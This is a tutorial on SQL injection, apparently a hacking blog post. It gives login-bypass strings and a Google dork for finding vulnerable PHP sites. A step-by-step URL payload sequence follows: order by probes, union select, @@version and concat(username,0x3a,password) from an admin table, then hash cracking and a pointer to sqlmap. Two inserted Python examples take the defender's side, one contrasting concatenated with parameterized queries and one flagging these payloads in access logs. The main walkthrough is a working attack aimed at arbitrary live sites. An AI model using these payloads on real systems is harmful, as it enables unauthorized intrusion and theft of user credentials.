SQL Injection

SQL, the Structured Query Language, consists of a set of commands used to store and retrieve data in a database. These commands are divided into four groups:

  1. DDL (Data Definition Language)
  2. DML (Data Manipulation Language)
  3. TCL (Transaction Control Statements)
  4. DCL (Data Control Statements)

Of these, DDL and DML are the basic and most important ones for beginners to learn.

You can find a reference for these commands here –

SQL DDL, DML, DCL, TCL Commands

SQL Injection is the technique of inserting SQL code into the query an application sends to its database, in such a way that data can be retrieved from the database without being a database admin or an authorized user. SQL Injection can be done in many ways; some of them are explained here.

The first way is to look for a vulnerability in the login form by inserting quotes and the special injection strings given below –

" or "1"="1   //Main Injection Strategy

This works as follows. A typical login query looks like this:

SELECT * FROM table_name WHERE username="" AND password=""

If we put the injection string into both fields, the query becomes:

SELECT * FROM table_name WHERE username="" or "1"="1" AND password="" or "1"="1"

Since "1"="1" is always true, both the username and the password conditions evaluate to true, the query executes successfully, and access is granted.

If the main injection strategy doesn't work, it means there are filters to deal with. A filter is simply a security measure put in place to protect against injection. For this case, try the following:

  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--

The above strings can be used if the main strategy doesn't work. There is also a second way to get at the database, using SQL commands against PHP-based websites.
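To make concrete what the login strings above (the main `" or "1"="1` strategy and the comment-terminated `admin' --` variant from the list) do to the query, here is an added Python example; it is not code from the original post. It builds the same kind of login query in the two ways that matter: by pasting the form fields into the SQL text, exactly as the vulnerable query above does, and with driver placeholders. The in-memory SQLite table, the accounts `alice` and `bob`, and the single-quote form of the strings are constructed for the example; SQLite accepts the single-quoted strings and `--` comments used here in the same way MySQL does.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table; the accounts are sample data for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext passwords only to keep the demonstration short; real systems store hashes.
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "correct-horse"), ("bob", "battery-staple")],
    )
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The pattern from the text: form fields pasted straight into the SQL string."""
    return (
        "SELECT username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )


def login_vulnerable(conn, username, password):
    """Run the concatenated query; the input is able to rewrite the WHERE clause."""
    return [row[0] for row in conn.execute(build_vulnerable_query(username, password))]


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the SQL text is fixed, the input is only data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    conn = make_db()
    tautology = "' or '1'='1"   # single-quote form of the page's main strategy
    comment = "alice' --"       # comment-terminated form from the filter list (page uses admin')
    print(build_vulnerable_query(tautology, tautology))
    print("vulnerable, tautology:", login_vulnerable(conn, tautology, tautology))
    print("vulnerable, comment:  ", login_vulnerable(conn, comment, "wrong"))
    print("safe, tautology:      ", login_safe(conn, tautology, tautology))
    print("safe, comment:        ", login_safe(conn, comment, "wrong"))
```

With the concatenated version the tautology string returns every user and the comment string returns `alice` with no password at all, because the rest of the WHERE clause has been commented out. With placeholders the statement that reaches the database is always `SELECT username FROM users WHERE username=? AND password=?`; only the bound values change, so both strings are compared literally and match nothing. When reviewing login code, the thing to search for is query text assembled with string formatting or concatenation.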

To find vulnerable websites we use Google Dorks.

The Google dork used here is:

inurl:index.php?id=

After searching with this dork, a list of vulnerable websites comes up, and you can SQL inject those sites using the following steps –

Introducing the SQL Injection Vulnerabilities
Exploiting SQL Injection Vulnerabilities:

Example website – http://www.website.com/articles.php?id=3

ADD A QUOTE AT THE END OF THE URL

http://www.website.com/articles.php?id=3'

Now, when this request is sent, you will get an error somewhere in the page.
Finding the number of columns:
ORDER BY is used to find the number of columns.
Add order by to the end of the URL along with a column number (any number to start with):

http://www.website.com/articles.php?id=3 order by 1/*

If no error arises, keep increasing the number until an error is displayed.
http://www.website.com/articles.php?id=3 order by 2/*

http://www.website.com/articles.php?id=3 order by 3/*

http://www.website.com/articles.php?id=3 order by 4/*

http://www.website.com/articles.php?id=3 order by 5/*

Here, if I get an error stating Unknown column '5', then there are only four columns.
Checking the UNION function:
UNION is used to get more information about the website.
http://www.website.com/articles.php?id=3 union all select 1,2,3,4/*

Here there are only four columns, so we go up to four;
if you found thirteen, then you have to go up to 13:
union all select 1,2,3,4,5,6,7,8,9,10,11,12,13/*

Now, if we see some of the numbers (1, 2, 3 or 4) on the page, the UNION function works.
If it does not work, we try changing the /* to --,
so we have this:
http://www.website.com/articles.php?id=3 union all select 1,2,3,4--

Getting the SQL version:
After checking the UNION we have a number on the screen;
say in this example that number is 3. This is the vulnerable position,
so all commands have to be injected in place of this number 3.
The number differs from website to website,
so choose it based on what your website shows.
We replace the 3 with @@version or version():

http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*

and now we have the version on the screen!
Getting table and column names:
If the MySQL version is < 5 (i.e. 4.1.33, 4.1.12, ...),
the admin table is checked:

http://www.website.com/articles.php?id=3 union all select 1,2,3,4 from admin/*

If we still see the number 3 that we had on the screen,
we know that the table admin exists.
Next we have to check the column names:

http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

If we get an error we have to try another column name,
and if it works we get the usernames displayed on screen.
The thing is, different websites use different column names, so we have to
check the names one by one (example: admin, moderator, super moderator, ...).
After that we check whether a password column exists:
http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*

We get the password!!!
Mostly the passwords are stored in different formats, so we have to convert them to text
using online converters.

Now we use 0x3a (the hex code for the colon character) to get the information
in the form username:password, e.g. admin:unhash...

http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*
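The sequence of requests described above (a trailing quote, `order by N` probes, `union all select`, `@@version`, `concat(..., 0x3a, ...)`) is exactly what the web server records, so it is also what a defender can look for in the access log. The following added example (Python; not code from the original post) runs a handful of simple rules over constructed Apache-style log lines that replay those steps against the page's `articles.php?id=` URL. The log lines, client addresses, rule labels and the assumption that `id` is declared as an integer parameter are all made up for the example. Because `id` is expected to be numeric, the first rule flags any non-numeric value, which catches the very first probe (the lone quote) before any SQL keyword appears.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache "combined"-style log lines replaying the steps from the text.
# Addresses are documentation ranges; nothing here is real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /articles.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /articles.php?id=3' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /articles.php?id=3%20order%20by%205/* HTTP/1.1" 500 298 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /articles.php?id=3%20union%20all%20select%201,2,@@version,4/* HTTP/1.1" 200 5201 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:01 +0000] "GET /articles.php?id=42 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:58:12 +0000] "GET /articles.php?id=3%20union%20all%20select%201,2,concat(username,0x3a,password),4,5%20from%20admin/* HTTP/1.1" 200 5330 "-" "Mozilla/5.0"
"""

# Fields we need from each line: client address, request target and response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Keyword rules, applied to the URL-decoded, lower-cased value of each query parameter.
RULES = [
    ("union select", re.compile(r"\bunion\b.*\bselect\b")),
    ("order-by probe", re.compile(r"\border\s+by\s+\d+")),
    ("version fingerprint", re.compile(r"@@version|\bversion\s*\(")),
    ("concat/hex literal", re.compile(r"\bconcat\s*\(|\b0x[0-9a-f]+\b")),
    ("comment terminator", re.compile(r"(/\*|--)\s*$")),
]

# Parameters the application defines as integers (hypothetical allow-list for the
# example's articles.php); anything non-numeric in them is suspicious on its own.
NUMERIC_PARAMS = {"id"}


def inspect_value(name, value):
    """Return the list of rule labels that fire for one decoded parameter value."""
    reasons = []
    if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
        reasons.append("non-numeric id")
    lowered = value.lower()
    for label, pattern in RULES:
        if pattern.search(lowered):
            reasons.append(label)
    return reasons


def analyze(log_text):
    """Parse each log line and report every parameter that trips at least one rule."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line in the expected shape; skip rather than crash
        query = urlsplit(match["target"]).query
        # parse_qsl percent-decodes the values, so %20 is a real space by the time rules run
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = inspect_value(name, value)
            if reasons:
                findings.append({
                    "ip": match["ip"],
                    "status": int(match["status"]),
                    "param": name,
                    "value": value,
                    "reasons": reasons,
                })
    return findings


def by_source(findings):
    """Count flagged requests per client address to surface a single probing host."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ip"], f["status"], f["param"], repr(f["value"]), ", ".join(f["reasons"]))
    print(by_source(analyze(SAMPLE_LOG)))
```

On the sample log, four of the six requests are flagged and all come from one address, which is the escalation pattern to alert on: a quote that produces a 500, then `order by` probes, then `union all select` with `@@version` and finally `concat(username,0x3a,password)`. The numeric-parameter check is the cheapest and most robust of the rules, since it does not depend on recognising any attacker keyword; the keyword rules mainly tell you how far the probing got. Feed real access-log text to `analyze()` in the same way.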


This is a sample SQL Injection.

There are other ways to do it, but I find this the simplest way. If you are fed up with typing the above commands, you can use automated tools to perform SQL Injection.

One such tool is SQLMAP, a highly sophisticated automated tool for performing any kind of SQL Injection attack on a website.

You can download the tool here–

SQL MAP – Automating SQL Injection

LEGAL DISCLAIMER

The content in this site is for educational purpose only. The author and members of the site are not responsible for the actions of the viewers. It is illegal to hack websites without the consent of the website owner.
